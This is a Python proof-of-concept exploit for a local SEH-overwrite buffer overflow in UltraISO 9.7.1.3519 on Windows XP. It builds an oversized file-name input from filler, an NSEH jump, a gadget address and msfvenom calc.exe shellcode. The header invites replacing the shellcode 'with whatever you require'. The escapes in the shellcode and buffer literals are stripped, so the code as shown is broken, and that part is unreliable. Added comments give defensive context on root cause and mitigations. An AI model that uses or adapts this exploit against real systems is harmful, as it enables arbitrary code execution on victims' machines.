#!/usr/bin/python
# Exploit Title: UltraISO 9.7.1.3519 - Local Buffer Overflow (SEH)
# Date: 30/01/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.ultraiso.com/
# Version: 9.7.1.3519
# Software Link: https://www.ultraiso.com/download.html
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Thanks to Francisco Ramirez for the original Windows 10 x64 DOS.
# Created in preparation for OSCE - DC - Telspace Systems
# PoC:
# 1.) Generate exploit.txt, copy the content to clipboard
# 2.) In the application, click "Make CD/DVD Image"
# 3.) Paste the contents of exploit.txt under 'Output FileName'
# 4.) Click OK - Calc POPS (or change shellcode to whatever you require, take note of badchars!)

#0x72d1170b : pop esi # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [msacm32.drv] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v5.1.2600.0
#NSEH - JMP 0012ED66 (xEBx08)

#msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -b "x00x0ax0dx3a" -f c

# Payload blob placed inside the overlong input. Per the author's msfvenom
# comment above, it is a windows/exec payload that launches calc.exe (a benign
# proof of code execution), encoded with x86/shikata_ga_nai and generated to
# avoid the listed bad characters.
# Defender note: shikata_ga_nai is a polymorphic encoder, so these exact bytes
# change on every generation. Static signatures on the blob are brittle;
# behavioural detection (the UltraISO process spawning an unexpected child
# process) is the more durable signal.
# NOTE(review): the backslash escapes are not intact in this listing, so the
# literal is printable text, not a byte-accurate copy of the published PoC.
# Do not derive byte signatures or lengths from it. TODO confirm against the
# original advisory.
shellcode = ("xdaxc0xd9x74x24xf4xbfx67xdcx50x39x5dx2bxc9xb1"
"x31x83xc5x04x31x7dx14x03x7dx73x3exa5xc5x93x3c"
"x46x36x63x21xcexd3x52x61xb4x90xc4x51xbexf5xe8"
"x1ax92xedx7bx6ex3bx01xccxc5x1dx2cxcdx76x5dx2f"
"x4dx85xb2x8fx6cx46xc7xcexa9xbbx2ax82x62xb7x99"
"x33x07x8dx21xbfx5bx03x22x5cx2bx22x03xf3x20x7d"
"x83xf5xe5xf5x8axedxeax30x44x85xd8xcfx57x4fx11"
"x2fxfbxaex9exc2x05xf6x18x3dx70x0ex5bxc0x83xd5"
"x26x1ex01xcex80xd5xb1x2ax31x39x27xb8x3dxf6x23"
"xe6x21x09xe7x9cx5dx82x06x73xd4xd0x2cx57xbdx83"
"x4dxcex1bx65x71x10xc4xdaxd7x5axe8x0fx6ax01x66"
"xd1xf8x3fxc4xd1x02x40x78xbax33xcbx17xbdxcbx1e"
"x5cx31x86x03xf4xdax4fxd6x45x87x6fx0cx89xbexf3"
"xa5x71x45xebxcfx74x01xabx3cx04x1ax5ex43xbbx1b"
"x4bx20x5ax88x17x89xf9x28xbdxd5")

# Overlong value pasted into the 'Output FileName' field (see the PoC steps in
# the header). Layout, following the author's comments above: 304 filler
# bytes, the 4-byte NSEH field, the SEH handler value (the msacm32.drv gadget
# address listed above), 20 bytes of padding, the payload, then 9448 bytes of
# trailing filler.
# Why it matters for defenders:
#  - Root cause is presumably an unbounded copy of the file-name field into a
#    fixed-size stack buffer. The fix is a length check on that input, and a
#    value this far beyond any valid Windows path should be rejected outright.
#  - The handler address is hard-coded and comes from a system module that the
#    author's note records as ASLR: False / SafeSEH: False on Windows XP SP3,
#    so the PoC is presumably tied to that OS build.
#  - SafeSEH (/SAFESEH), SEHOP, ASLR (/DYNAMICBASE) and DEP are the standard
#    mitigations for SEH-overwrite techniques. Confirm they are enabled on
#    hosts still running this UltraISO version.
# NOTE: the name `buffer` shadows the Python 2 builtin of the same name.
buffer = "A" * 304 + "xEBx08x90x90" + "x0bx17xd1x72" + "x90" * 20 + shellcode + "D" * 9448

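payload = buffer

# Write the proof-of-concept input to exploit.txt in the current working
# directory. This is the test artefact a maintainer pastes into the vulnerable
# field to reproduce the crash and to verify a fix.
# Changes from the original listing:
#  - the lost indentation of the try/except body is restored;
#  - `with` closes the file even if the write fails;
#  - only I/O errors are caught, so a bare `except:` no longer hides
#    unrelated failures such as KeyboardInterrupt;
#  - print is called with a single parenthesised argument, which behaves the
#    same under Python 2 and Python 3.
try:
    with open("exploit.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        f.write(payload)
    print("[+] File created!")
except (IOError, OSError):
    print("File cannot be created")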